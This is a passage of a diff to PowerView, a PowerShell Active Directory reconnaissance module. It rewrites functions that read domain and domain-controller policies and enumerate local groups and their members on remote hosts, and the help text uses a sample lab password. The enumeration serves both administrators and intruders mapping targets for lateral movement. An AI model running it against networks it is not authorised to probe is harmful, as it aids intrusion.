-                $Object = Get-ADObject -Domain $Domain -DomainController $DomainController -PageSize $PageSize -SID $_
+Returns the default domain policy or the domain controller policy for the current
+domain or a specified domain/domain controller.
 
-                $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID  
 
-                $GPOComputerAdmin = New-Object PSObject
-                $GPOComputerAdmin | Add-Member Noteproperty 'ComputerName' $ComputerName
-                $GPOComputerAdmin | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
-                $GPOComputerAdmin | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
-                $GPOComputerAdmin | Add-Member Noteproperty 'ObjectSID' $_
-                $GPOComputerAdmin | Add-Member Noteproperty 'IsGroup' $IsGroup
-                $GPOComputerAdmin | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName
-                $GPOComputerAdmin | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName
-                $GPOComputerAdmin | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath
-                $GPOComputerAdmin | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType
-                $GPOComputerAdmin
+.DESCRIPTION
 
-                # if we're recursing and the current result object is a group
-                if($Recurse -and $GPOComputerAdmin.isGroup) {
+Returns the default domain policy or the domain controller policy for the current
+domain or a specified domain/domain controller using Get-DomainGPO.
 
-                    Get-NetGroupMember -Domain $Domain -DomainController $DomainController -SID $_ -FullData -Recurse -PageSize $PageSize | ForEach-Object {
+.PARAMETER Domain
 
-                        $MemberDN = $_.distinguishedName
+The domain to query for default policies, defaults to the current domain.
 
-                        # extract the FQDN from the Distinguished Name
-                        $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'
+.PARAMETER Source
 
-                        $MemberIsGroup = @('268435456','268435457','536870912','536870913') -contains $_.samaccounttype
+Extract 'Domain' or 'DC' (domain controller) policies.
 
-                        if ($_.samAccountName) {
-                            # forest users have the samAccountName set
-                            $MemberName = $_.samAccountName
-                        }
-                        else {
-                            # external trust users have a SID, so convert it
-                            try {
-                                $MemberName = Convert-SidToName $_.cn
-                            }
-                            catch {
-                                # if there's a problem contacting the domain to resolve the SID
-                                $MemberName = $_.cn
-                            }
-                        }
+.PARAMETER Server
 
-                        $GPOComputerAdmin = New-Object PSObject
-                        $GPOComputerAdmin | Add-Member Noteproperty 'ComputerName' $ComputerName
-                        $GPOComputerAdmin | Add-Member Noteproperty 'ObjectName' $MemberName
-                        $GPOComputerAdmin | Add-Member Noteproperty 'ObjectDN' $MemberDN
-                        $GPOComputerAdmin | Add-Member Noteproperty 'ObjectSID' $_.objectsid
-                        $GPOComputerAdmin | Add-Member Noteproperty 'IsGroup' $MemberIsGrou
-                        $GPOComputerAdmin | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName
-                        $GPOComputerAdmin | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName
-                        $GPOComputerAdmin | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath
-                        $GPOComputerAdmin | Add-Member Noteproperty 'GPOType' $GPOTypep
-                        $GPOComputerAdmin 
-                    }
-                }
-            }
-        }
-    }
-}
+Specifies an Active Directory server (domain controller) to bind to.
 
+.PARAMETER ServerTimeLimit
 
-function Get-DomainPolicy {
-<#
-    .SYNOPSIS
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        Returns the default domain or DC policy for a given
-        domain or domain controller.
+.PARAMETER ResolveSids
 
-        Thanks Sean Metacalf (@pyrotek3) for the idea and guidance.
+Switch. Resolve Sids from a DC policy to object names.
 
-    .PARAMETER Source
+.PARAMETER Credential
 
-        Extract Domain or DC (domain controller) policies.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .PARAMETER Domain
+.EXAMPLE
 
-        The domain to query for default policies, defaults to the current domain.
+Get-DomainPolicy
 
-    .PARAMETER DomainController
+Returns the domain policy for the current domain.
 
-        Domain controller to reflect LDAP queries through.
+.EXAMPLE
 
-    .PARAMETER ResolveSids
+Get-DomainPolicy -Domain dev.testlab.local
 
-        Switch. Resolve Sids from a DC policy to object names.
+Returns the domain policy for the dev.testlab.local domain.
 
-    .PARAMETER UsePSDrive
+.EXAMPLE
 
-        Switch. Mount any found policy files with temporary PSDrives.
+Get-DomainPolicy -Source DC -Domain dev.testlab.local
 
-    .EXAMPLE
+Returns the policy for the dev.testlab.local domain controller.
 
-        PS C:\> Get-DomainPolicy
+.EXAMPLE
 
-        Returns the domain policy for the current domain. 
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainPolicy -Credential $Cred
 
-    .EXAMPLE
+.OUTPUTS
 
-        PS C:\> Get-DomainPolicy -Source DC -DomainController MASTER.testlab.local
+Hashtable
 
-        Returns the policy for the MASTER.testlab.local domain controller.
+Ouputs a hashtable representing the parsed GptTmpl.inf file.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType([Hashtable])]
     [CmdletBinding()]
-    Param (
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Name')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        [ValidateSet("Domain","DC")]
-        $Source ="Domain",
+        $Domain,
 
+        [ValidateSet('Domain', 'DC', 'DomainController')]
         [String]
-        $Domain,
+        $Source = 'Domain',
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $DomainController,
+        $Server,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
         [Switch]
         $ResolveSids,
 
-        [Switch]
-        $UsePSDrive
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    if($Source -eq "Domain") {
-        # query the given domain for the default domain policy object
-        $GPO = Get-NetGPO -Domain $Domain -DomainController $DomainController -GPOname "{31B2F340-016D-11D2-945F-00C04FB984F9}"
-        
-        if($GPO) {
-            # grab the GptTmpl.inf file and parse it
-            $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
+    BEGIN {
+        $SearcherArguments = @{}
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
 
-            $ParseArgs =  @{
-                'GptTmplPath' = $GptTmplPath
-                'UsePSDrive' = $UsePSDrive
-            }
+        $ConvertArguments = @{}
+        if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server }
+        if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }
+    }
 
-            # parse the GptTmpl.inf
-            Get-GptTmpl @ParseArgs
+    PROCESS {
+        if ($PSBoundParameters['Domain']) {
+            $SearcherArguments['Domain'] = $Domain
+            $ConvertArguments['Domain'] = $Domain
         }
 
-    }
-    elseif($Source -eq "DC") {
-        # query the given domain/dc for the default domain controller policy object
-        $GPO = Get-NetGPO -Domain $Domain -DomainController $DomainController -GPOname "{6AC1786C-016F-11D2-945F-00C04FB984F9}"
-
-        if($GPO) {
-            # grab the GptTmpl.inf file and parse it
-            $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
+        if ($Source -eq 'Domain') {
+            # query the given domain for the default domain policy object (name = {31B2F340-016D-11D2-945F-00C04FB984F9})
+            $SearcherArguments['Identity'] = '{31B2F340-016D-11D2-945F-00C04FB984F9}'
+            $GPO = Get-DomainGPO @SearcherArguments
 
-            $ParseArgs =  @{
-                'GptTmplPath' = $GptTmplPath
-                'UsePSDrive' = $UsePSDrive
+            if ($GPO) {
+                # grab the GptTmpl.inf file and parse it
+                $GptTmplPath = $GPO.gpcfilesyspath + '\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf'
+                $ParseArgs =  @{'GptTmplPath' = $GptTmplPath}
+                if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential }
+                Get-GptTmpl @ParseArgs
             }
-
-            # parse the GptTmpl.inf
-            Get-GptTmpl @ParseArgs | ForEach-Object {
-                if($ResolveSids) {
-                    # if we're resolving sids in PrivilegeRights to names
-                    $Policy = New-Object PSObject
-                    $_.psobject.properties | ForEach-Object {
-                        if( $_.Name -eq 'PrivilegeRights') {
-
-                            $PrivilegeRights = New-Object PSObject
-                            # for every nested SID member of PrivilegeRights, try to unpack everything and resolve the SIDs as appropriate
-                            $_.Value.psobject.properties | ForEach-Object {
-
-                                $Sids = $_.Value | ForEach-Object {
+        }
+        else {
+            # query the given domain/dc for the default domain controller policy object (name = {6AC1786C-016F-11D2-945F-00C04FB984F9})
+            $SearcherArguments['Identity'] = '{6AC1786C-016F-11D2-945F-00C04FB984F9}'
+            $GPO = Get-DomainGPO @SearcherArguments
+
+            if ($GPO) {
+                # grab the GptTmpl.inf file and parse it
+                $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
+
+                $ParseArgs =  @{'GptTmplPath' = $GptTmplPath}
+                if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential }
+
+                # parse the GptTmpl.inf
+                Get-GptTmpl @ParseArgs | ForEach-Object {
+                    if ($PSBoundParameters['ResolveSids']) {
+                        $Root = $_
+                        $PrivilegeRightsResovled = @{}
+                        # if we're resolving sids in PrivilegeRights to names
+                        if ($Root.'Privilege Rights') {
+                            $PrivilegeRights = $Root.'Privilege Rights'
+                            ForEach ($PrivilegeRight in $PrivilegeRights.Keys) {
+                                $PrivilegeRightsResovled[$PrivilegeRight] = $PrivilegeRights."$PrivilegeRight" | ForEach-Object {
                                     try {
-                                        if($_ -isnot [System.Array]) { 
-                                            Convert-SidToName $_ 
-                                        }
-                                        else {
-                                            $_ | ForEach-Object { Convert-SidToName $_ }
-                                        }
+                                        $_ | ForEach-Object { ConvertFrom-SID -ObjectSid ($_.Trim('*')) @ConvertArguments }
                                     }
                                     catch {
-                                        Write-Verbose "Error resolving SID : $_"
+                                        Write-Verbose "[Get-DomainPolicy] Error resolving SID : $_"
+                                        $_
                                     }
                                 }
-
-                                $PrivilegeRights | Add-Member Noteproperty $_.Name $Sids
                             }
-
-                            $Policy | Add-Member Noteproperty 'PrivilegeRights' $PrivilegeRights
-                        }
-                        else {
-                            $Policy | Add-Member Noteproperty $_.Name $_.Value
                         }
+                        $Root.'Privilege Rights' = $PrivilegeRightsResovled
+                        $Root
                     }
-                    $Policy
+                    else { $_ }
                 }
-                else { $_ }
             }
         }
     }
 }
 
 
-
 ########################################################
 #
 # Functions that enumerate a single host, either through
-# WinNT, WMI, remote registry, or API calls 
+# WinNT, WMI, remote registry, or API calls
 # (with PSReflect).
 #
 ########################################################
 
 function Get-NetLocalGroup {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Gets a list of all current users in a specified local group,
-        or returns the names of all local groups with -ListGroups.
+Enumerates the local groups on the local (or remote) machine.
 
-    .PARAMETER ComputerName
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect  
 
-        The hostname or IP to query for local group users.
+.DESCRIPTION
 
-    .PARAMETER ComputerFile
+This function will enumerate the names and descriptions for the
+local groups on the current, or remote, machine. By default, the Win32 API
+call NetLocalGroupEnum will be used (for speed). Specifying "-Method WinNT"
+causes the WinNT service provider to be used instead, which returns group
+SIDs along with the group names and descriptions/comments.
 
-        File of hostnames/IPs to query for local group users.
+.PARAMETER ComputerName
 
-    .PARAMETER GroupName
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to the localhost.
 
-        The local group name to query for users. If not given, it defaults to "Administrators"
+.PARAMETER Method
 
-    .PARAMETER ListGroups
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
 
-        Switch. List all the local groups instead of their members.
-        Old Get-NetLocalGroups functionality.
+.PARAMETER Credential
 
-    .PARAMETER Recurse
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to a remote machine. Only applicable with "-Method WinNT".
 
-        Switch. If the local member member is a domain group, recursively try to resolve its members to get a list of domain users who can access this machine.
+.EXAMPLE
 
-    .PARAMETER API
+Get-NetLocalGroup
 
-        Switch. Use API calls instead of the WinNT service provider. Less information,
-        but the results are faster.
+ComputerName                  GroupName                     Comment
+------------                  ---------                     -------
+WINDOWS1                      Administrators                Administrators have comple...
+WINDOWS1                      Backup Operators              Backup Operators can overr...
+WINDOWS1                      Cryptographic Operators       Members are authorized to ...
+...
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetLocalGroup
+Get-NetLocalGroup -Method Winnt
 
-        Returns the usernames that of members of localgroup "Administrators" on the local host.
+ComputerName           GroupName              GroupSID              Comment
+------------           ---------              --------              -------
+WINDOWS1               Administrators         S-1-5-32-544          Administrators hav...
+WINDOWS1               Backup Operators       S-1-5-32-551          Backup Operators c...
+WINDOWS1               Cryptographic Opera... S-1-5-32-569          Members are author...
+...
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetLocalGroup -ComputerName WINDOWSXP
+Get-NetLocalGroup -ComputerName primary.testlab.local
 
-        Returns all the local administrator accounts for WINDOWSXP
+ComputerName                  GroupName                     Comment
+------------                  ---------                     -------
+primary.testlab.local         Administrators                Administrators have comple...
+primary.testlab.local         Users                         Users are prevented from m...
+primary.testlab.local         Guests                        Guests have the same acces...
+primary.testlab.local         Print Operators               Members can administer dom...
+primary.testlab.local         Backup Operators              Backup Operators can overr...
 
-    .EXAMPLE
+.OUTPUTS
 
-        PS C:\> Get-NetLocalGroup -ComputerName WINDOWS7 -Recurse 
+PowerView.LocalGroup.API
 
-        Returns all effective local/domain users/groups that can access WINDOWS7 with
-        local administrative privileges.
+Custom PSObject with translated group property fields from API results.
 
-    .EXAMPLE
+PowerView.LocalGroup.WinNT
 
-        PS C:\> Get-NetLocalGroup -ComputerName WINDOWS7 -ListGroups
+Custom PSObject with translated group property fields from WinNT results.
 
-        Returns all local groups on the WINDOWS7 host.
+.LINK
 
-    .EXAMPLE
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx
+#>
 
-        PS C:\> "WINDOWS7", "WINDOWSSP" | Get-NetLocalGroup -API
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.LocalGroup.API')]
+    [OutputType('PowerView.LocalGroup.WinNT')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $ComputerName = $Env:COMPUTERNAME,
 
-        Returns all local groups on the the passed hosts using API calls instead of the
-        WinNT service provider.
+        [ValidateSet('API', 'WinNT')]
+        [Alias('CollectionMethod')]
+        [String]
+        $Method = 'API',
 
-    .LINK
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
 
-        http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
-        http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
-#>
+    BEGIN {
+        if ($PSBoundParameters['Credential'] -and ($Method -eq 'WinNT')) {
+            Write-Warning "[Get-NetLocalGroup] -Credential is only compatible with '-Method WinNT'"
+        }
+    }
 
-    [CmdletBinding(DefaultParameterSetName = 'WinNT')]
-    param(
-        [Parameter(ParameterSetName = 'API', Position=0, ValueFromPipeline=$True)]
-        [Parameter(ParameterSetName = 'WinNT', Position=0, ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [String[]]
-        $ComputerName = $Env:ComputerName,
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            if ($Method -eq 'API') {
+                # if we're using the Netapi32 NetLocalGroupEnum API call to get the local group information
 
-        [Parameter(ParameterSetName = 'WinNT')]
-        [Parameter(ParameterSetName = 'API')]
-        [ValidateScript({Test-Path -Path $_ })]
-        [Alias('HostList')]
-        [String]
-        $ComputerFile,
+                # arguments for NetLocalGroupEnum
+                $QueryLevel = 1
+                $PtrInfo = [IntPtr]::Zero
+                $EntriesRead = 0
+                $TotalRead = 0
+                $ResumeHandle = 0
 
-        [Parameter(ParameterSetName = 'WinNT')]
-        [Parameter(ParameterSetName = 'API')]
-        [String]
-        $GroupName = 'Administrators',
+                # get the local user information
+                $Result = $Netapi32::NetLocalGroupEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
 
-        [Parameter(ParameterSetName = 'WinNT')]
-        [Switch]
-        $ListGroups,
+                # locate the offset of the initial intPtr
+                $Offset = $PtrInfo.ToInt64()
 
-        [Parameter(ParameterSetName = 'WinNT')]
-        [Switch]
-        $Recurse,
+                # 0 = success
+                if (($Result -eq 0) -and ($Offset -gt 0)) {
 
-        [Parameter(ParameterSetName = 'API')]
-        [Switch]
-        $API
-    )
+                    # Work out how much to increment the pointer by finding out the size of the structure
+                    $Increment = $LOCALGROUP_INFO_1::GetSize()
 
-    process {
+                    # parse all the result structures
+                    for ($i = 0; ($i -lt $EntriesRead); $i++) {
+                        # create a new int ptr at the given offset and cast the pointer as our result structure
+                        $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+                        $Info = $NewIntPtr -as $LOCALGROUP_INFO_1
 
-        $Servers = @()
+                        $Offset = $NewIntPtr.ToInt64()
+                        $Offset += $Increment
 
-        # if we have a host list passed, grab it
-        if($ComputerFile) {
-            $Servers = Get-Content -Path $ComputerFile
-        }
-        else {
-            # otherwise assume a single host name
-            $Servers += $ComputerName | Get-NameField
+                        $LocalGroup = New-Object PSObject
+                        $LocalGroup | Add-Member Noteproperty 'ComputerName' $Computer
+                        $LocalGroup | Add-Member Noteproperty 'GroupName' $Info.lgrpi1_name
+                        $LocalGroup | Add-Member Noteproperty 'Comment' $Info.lgrpi1_comment
+                        $LocalGroup.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.API')
+                        $LocalGroup
+                    }
+                    # free up the result buffer
+                    $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+                }
+                else {
+                    Write-Verbose "[Get-NetLocalGroup] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+                }
+            }
+            else {
+                # otherwise we're using the WinNT service provider
+                if ($Credential -ne [Management.Automation.PSCredential]::Empty) {
+                    $ComputerProvider = New-Object DirectoryServices.DirectoryEntry("WinNT://$Computer,computer", $Credential.UserName, $Credential.GetNetworkCredential().Password)
+                }
+                else {
+                    $ComputerProvider = [ADSI]"WinNT://$Computer,computer"
+                }
+
+                $ComputerProvider.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object {
+                    $LocalGroup = ([ADSI]$_)
+                    $Group = New-Object PSObject
+                    $Group | Add-Member Noteproperty 'ComputerName' $Computer
+                    $Group | Add-Member Noteproperty 'GroupName' ($LocalGroup.InvokeGet('Name'))
+                    $Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalGroup.InvokeGet('objectsid'),0)).Value)
+                    $Group | Add-Member Noteproperty 'Comment' ($LocalGroup.InvokeGet('Description'))
+                    $Group.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.WinNT')
+                    $Group
+                }
+            }
         }
+    }
+}
+
+
+function Get-NetLocalGroupMember {
+<#
+.SYNOPSIS
+
+Enumerates members of a specific local group on the local (or remote) machine.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect, Convert-ADName  
+
+.DESCRIPTION
+
+This function will enumerate the members of a specified local group  on the
+current, or remote, machine. By default, the Win32 API call NetLocalGroupGetMembers
+will be used (for speed). Specifying "-Method WinNT" causes the WinNT service provider
+to be used instead, which returns a larger amount of information.
+
+.PARAMETER ComputerName
+
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to the localhost.
+
+.PARAMETER GroupName
+
+The local group name to query for users. If not given, it defaults to "Administrators".
+
+.PARAMETER Method
+
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to a remote machine. Only applicable with "-Method WinNT".
+
+.EXAMPLE
+
+Get-NetLocalGroupMember | ft
+
+ComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain
+------------   ---------      ----------     ---                   -------       --------
+WINDOWS1       Administrators WINDOWS1\Ad... S-1-5-21-25...          False          False
+WINDOWS1       Administrators WINDOWS1\lo... S-1-5-21-25...          False          False
+WINDOWS1       Administrators TESTLAB\Dom... S-1-5-21-89...           True           True
+WINDOWS1       Administrators TESTLAB\har... S-1-5-21-89...          False           True
+
+.EXAMPLE
+
+Get-NetLocalGroupMember -Method winnt | ft
+
+ComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain
+------------   ---------      ----------     ---                   -------       --------
+WINDOWS1       Administrators WINDOWS1\Ad... S-1-5-21-25...          False          False
+WINDOWS1       Administrators WINDOWS1\lo... S-1-5-21-25...          False          False
+WINDOWS1       Administrators TESTLAB\Dom... S-1-5-21-89...           True           True
+WINDOWS1       Administrators TESTLAB\har... S-1-5-21-89...          False           True
+
+.EXAMPLE
+
+Get-NetLocalGroup | Get-NetLocalGroupMember | ft
+
+ComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain
+------------   ---------      ----------     ---                   -------       --------
+WINDOWS1       Administrators WINDOWS1\Ad... S-1-5-21-25...          False          False
+WINDOWS1       Administrators WINDOWS1\lo... S-1-5-21-25...          False          False
+WINDOWS1       Administrators TESTLAB\Dom... S-1-5-21-89...           True           True
+WINDOWS1       Administrators TESTLAB\har... S-1-5-21-89...          False           True
+WINDOWS1       Guests         WINDOWS1\Guest S-1-5-21-25...          False          False
+WINDOWS1       IIS_IUSRS      NT AUTHORIT... S-1-5-17                False          False
+WINDOWS1       Users          NT AUTHORIT... S-1-5-4                 False          False
+WINDOWS1       Users          NT AUTHORIT... S-1-5-11                False          False
+WINDOWS1       Users          WINDOWS1\lo... S-1-5-21-25...          False        UNKNOWN
+WINDOWS1       Users          TESTLAB\Dom... S-1-5-21-89...           True        UNKNOWN
+
+.EXAMPLE
+
+Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft
+
+ComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain
+------------   ---------      ----------     ---                   -------       --------
+primary.tes... Administrators TESTLAB\Adm... S-1-5-21-89...          False          False
+primary.tes... Administrators TESTLAB\loc... S-1-5-21-89...          False          False
+primary.tes... Administrators TESTLAB\Ent... S-1-5-21-89...           True          False
+primary.tes... Administrators TESTLAB\Dom... S-1-5-21-89...           True          False
+
+.OUTPUTS
+
+PowerView.LocalGroupMember.API
+
+Custom PSObject with translated group property fields from API results.
+
+PowerView.LocalGroupMember.WinNT
+
+Custom PSObject with translated group property fields from WinNT results.
+
+.LINK
 
-        # query the specified group using the WINNT provider, and
-        # extract fields as appropriate from the results
-        ForEach($Server in $Servers) {
+http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
+http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.LocalGroupMember.API')]
+    [OutputType('PowerView.LocalGroupMember.WinNT')]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $ComputerName = $Env:COMPUTERNAME,
 
-            if($API) {
+        [Parameter(ValueFromPipelineByPropertyName = $True)]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $GroupName = 'Administrators',
+
+        [ValidateSet('API', 'WinNT')]
+        [Alias('CollectionMethod')]
+        [String]
+        $Method = 'API',
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    BEGIN {
+        if ($PSBoundParameters['Credential'] -and ($Method -eq 'WinNT')) {
+            Write-Warning "[Get-NetLocalGroupMember] -Credential is only compatible with '-Method WinNT'"
+        }
+    }
+
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            if ($Method -eq 'API') {
                 # if we're using the Netapi32 NetLocalGroupGetMembers API call to get the local group information
+
                 # arguments for NetLocalGroupGetMembers
                 $QueryLevel = 2
                 $PtrInfo = [IntPtr]::Zero
@@ -7748,12 +12372,12 @@ function Get-NetLocalGroup {
                 $ResumeHandle = 0
 
                 # get the local user information
-                $Result = $Netapi32::NetLocalGroupGetMembers($Server, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+                $Result = $Netapi32::NetLocalGroupGetMembers($Computer, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
 
-                # Locate the offset of the initial intPtr
+                # locate the offset of the initial intPtr
                 $Offset = $PtrInfo.ToInt64()
 
-                $LocalUsers = @()
+                $Members = @()
 
                 # 0 = success
                 if (($Result -eq 0) -and ($Offset -gt 0)) {
@@ -7770,23 +12394,22 @@ function Get-NetLocalGroup {
                         $Offset = $NewIntPtr.ToInt64()
                         $Offset += $Increment
 
-                        $SidString = ""
+                        $SidString = ''
                         $Result2 = $Advapi32::ConvertSidToStringSid($Info.lgrmi2_sid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
 
-                        if($Result2 -eq 0) {
-                            Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+                        if ($Result2 -eq 0) {
+                            Write-Verbose "[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
                         }
                         else {
-                            $LocalUser = New-Object PSObject
-                            $LocalUser | Add-Member Noteproperty 'ComputerName' $Server
-                            $LocalUser | Add-Member Noteproperty 'AccountName' $Info.lgrmi2_domainandname
-                            $LocalUser | Add-Member Noteproperty 'SID' $SidString
-
+                            $Member = New-Object PSObject
+                            $Member | Add-Member Noteproperty 'ComputerName' $Computer
+                            $Member | Add-Member Noteproperty 'GroupName' $GroupName
+                            $Member | Add-Member Noteproperty 'MemberName' $Info.lgrmi2_domainandname
+                            $Member | Add-Member Noteproperty 'SID' $SidString
                             $IsGroup = $($Info.lgrmi2_sidusage -eq 'SidTypeGroup')
-                            $LocalUser | Add-Member Noteproperty 'IsGroup' $IsGroup
-                            $LocalUser.PSObject.TypeNames.Add('PowerView.LocalUserAPI')
-
-                            $LocalUsers += $LocalUser
+                            $Member | Add-Member Noteproperty 'IsGroup' $IsGroup
+                            $Member.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroupMember.API')
+                            $Members += $Member
                         }
                     }
 
@@ -7794,1450 +12417,1905 @@ function Get-NetLocalGroup {
                     $Null = $Netapi32::NetApiBufferFree($PtrInfo)
 
                     # try to extract out the machine SID by using the -500 account as a reference
-                    $MachineSid = $LocalUsers | Where-Object {$_.SID -like '*-500'}
-                    $Parts = $MachineSid.SID.Split('-')
-                    $MachineSid = $Parts[0..($Parts.Length -2)] -join '-'
+                    $MachineSid = $Members | Where-Object {$_.SID -match '.*-500' -or ($_.SID -match '.*-501')} | Select-Object -Expand SID
+                    if ($MachineSid) {
+                        $MachineSid = $MachineSid.Substring(0, $MachineSid.LastIndexOf('-'))
 
-                    $LocalUsers | ForEach-Object {
-                        if($_.SID -match $MachineSid) {
-                            $_ | Add-Member Noteproperty 'IsDomain' $False
+                        $Members | ForEach-Object {
+                            if ($_.SID -match $MachineSid) {
+                                $_ | Add-Member Noteproperty 'IsDomain' $False
+                            }
+                            else {
+                                $_ | Add-Member Noteproperty 'IsDomain' $True
+                            }
                         }
-                        else {
-                            $_ | Add-Member Noteproperty 'IsDomain' $True
+                    }
+                    else {
+                        $Members | ForEach-Object {
+                            if ($_.SID -notmatch 'S-1-5-21') {
+                                $_ | Add-Member Noteproperty 'IsDomain' $False
+                            }
+                            else {
+                                $_ | Add-Member Noteproperty 'IsDomain' 'UNKNOWN'
+                            }
                         }
                     }
-                    $LocalUsers
+                    $Members
                 }
                 else {
-                    Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+                    Write-Verbose "[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
                 }
             }
-
             else {
                 # otherwise we're using the WinNT service provider
                 try {
-                    if($ListGroups) {
-                        # if we're listing the group names on a remote server
-                        $Computer = [ADSI]"WinNT://$Server,computer"
-
-                        $Computer.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object {
-                            $Group = New-Object PSObject
-                            $Group | Add-Member Noteproperty 'Server' $Server
-                            $Group | Add-Member Noteproperty 'Group' ($_.name[0])
-                            $Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier $_.objectsid[0],0).Value)
